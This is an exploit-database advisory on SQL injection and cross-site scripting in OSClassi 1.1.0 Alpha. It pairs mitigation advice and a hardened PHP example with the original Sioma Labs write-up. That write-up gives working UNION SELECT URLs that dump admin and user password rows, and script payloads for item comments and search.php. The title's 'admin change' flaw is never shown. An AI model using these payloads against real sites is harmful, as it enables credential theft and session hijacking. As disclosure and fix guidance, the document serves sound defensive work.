Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities - exploit.company
vendor: Open Source Classifieds (OSClassi)
by: Sioma Labs
CVSS: 7.5 (HIGH)
CWE: 89, 79 (SQL Injection, Cross-Site Scripting (XSS))
Product Name: Open Source Classifieds (OSClassi)
Affected Version From: 1.1.0 Alpha
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 (WAMP)

Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities

OSClassi 1.1.0 Alpha is affected by SQL injection and cross-site scripting flaws. The SQL injection, reachable through the id parameter of item.php, lets an attacker execute arbitrary SQL against the backing database and potentially read its contents without authorization. The XSS, reachable through item comments in item.php and the pattern parameter of search.php, lets an attacker inject scripts into pages viewed by other users.

Mitigation:

To mitigate the SQL injection, developers should use parameterized queries (prepared statements) so that user-supplied values are always bound as data rather than spliced into the SQL text, and should validate that numeric parameters such as id are integers before use. To mitigate the XSS, developers should validate user input on the way in and encode it for HTML on the way out, before it is written into a web page.
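The mitigation above, worked through as an added example that is not OSClassi's code nor the advisory author's: PHP with PDO over an in-memory SQLite database, showing the advisory's two weak patterns (an id spliced into SQL text, user text stored and echoed unescaped) next to prepared statements and HTML output encoding. The table and column names (oc_item, oc_item_comment, title, ...), the function names and the sample inputs are assumptions constructed for this example.

```php
<?php
// Added example, not OSClassi's own code: the two patterns the advisory describes
// (an id spliced into SQL, and user text echoed into HTML) next to hardened forms.
// It uses PDO over an in-memory SQLite database so it runs offline; the table and
// column names (oc_item, oc_item_comment, id, title, ...) are assumptions.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE oc_item (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE oc_item_comment (id INTEGER PRIMARY KEY, item_id INTEGER,
           author_name TEXT, author_email TEXT, body TEXT)');
$db->exec("INSERT INTO oc_item (id, title) VALUES (1, 'Bicycle for sale')");

// VULNERABLE (the advisory's item.php pattern): the id becomes part of the SQL text,
// so a value beginning with "-1 UNION SELECT ..." is executed as SQL.
function findItemUnsafe(PDO $db, string $id): array
{
    $sql = sprintf('SELECT id, title FROM oc_item WHERE id = %s', $id);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: validate the shape first, then bind the value as data in a prepared statement.
function findItemSafe(PDO $db, string $rawId): array
{
    if (filter_var($rawId, FILTER_VALIDATE_INT) === false) {
        return [];                        // not an integer: refuse rather than guess
    }
    $stmt = $db->prepare('SELECT id, title FROM oc_item WHERE id = :id');
    $stmt->execute([':id' => (int) $rawId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED add_comment: every field is bound, so quotes in the body cannot alter the query.
function addCommentSafe(PDO $db, int $itemId, string $name, string $email, string $body): void
{
    $stmt = $db->prepare(
        'INSERT INTO oc_item_comment (item_id, author_name, author_email, body)
         VALUES (:item, :name, :email, :body)'
    );
    $stmt->execute([':item' => $itemId, ':name' => $name, ':email' => $email, ':body' => $body]);
}

// HARDENED output: encode user-controlled text at the point it enters HTML.
function escapeHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs shaped like the advisory's: an injected id and a script-bearing comment.
$injectedId = '-1 UNION SELECT 1, sqlite_version()';
$scriptBody = '"><script>alert(1)</script>';

var_dump(findItemUnsafe($db, $injectedId));   // the UNION is executed as part of the query
var_dump(findItemSafe($db, $injectedId));     // the same input is rejected before any query
var_dump(findItemSafe($db, '1'));             // a legitimate lookup still works

addCommentSafe($db, 1, 'Alice', 'alice@example.com', $scriptBody);
foreach ($db->query('SELECT author_name, body FROM oc_item_comment') as $row) {
    // Stored exactly as typed, rendered inert: the browser shows the text instead of running it.
    echo '<p><b>' . escapeHtml($row['author_name']) . '</b>: ' . escapeHtml($row['body']) . '</p>', PHP_EOL;
}
// The search.php case: the pattern is encoded before it is placed into the heading.
echo '<h2>Results for: ' . escapeHtml($_GET['pattern'] ?? '') . '</h2>', PHP_EOL;
```

Run it from the command line with the pdo_sqlite extension loaded. The unsafe lookup returns a row that is not an item at all (the second column carries the SQLite version string), the safe lookup rejects the same input and returns an empty array, and the stored comment is printed with its quotes and angle brackets encoded. Note that the fix has two independent halves: binding parameters stops the database from interpreting input as SQL, and output encoding stops the browser from interpreting it as markup; neither substitutes for the other.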
Source (Exploit-DB raw data):

 __ _                           __       _         
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___ 
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
========================================================================================
Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities
----------------------------------------------------------------------------------------
- Site      : http://osclass.org/
- Download  : http://sourceforge.net/projects/osclass/files/
- Author    : Sioma Labs
- Version   : 1.1.0 Alpha
- Tested on : Windows XP SP2 (WAMP)

[-------------------------------------------------------------------------------------------------------------------------]

MYSQL Injection 
===============
POC
http://server/item.php?id=[SQLi]

Basic Info
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--

Admin ID,Username,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--

User ID,UserName,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--

[-------------------------------------------------------------------------------------------------------------------------]
Cross Site Scripting
====================

Xss Source Review (item.php)
------------------------------

1st Xss item.php 
[+] To work this you need to have an item already posted (http://server/item.php?action=post)
------------------------------
	case 'add_comment':
		// The $_POST fields go straight into the INSERT and are later rendered on item.php without sanitisation
		dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",
			DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
		header('Location: item.php?id=' . $_POST['id']);
		break;
	case 'post':
------------------------------

[+] Put this c0de into the comment box
"><script>alert(String.fromCharCode(88, 83, 83));</script>

-------------------------------

2nd Xss (search.php)
---------------------------------
$pattern = $_GET['pattern'];
--------------------------------

POC
http://server/search.php?pattern=[Xss]
Exploit
http://server/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>

[-------------------------------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------------------------------]
# http://siomalabs.com [Sioma Labs]
# Sioma Agent 154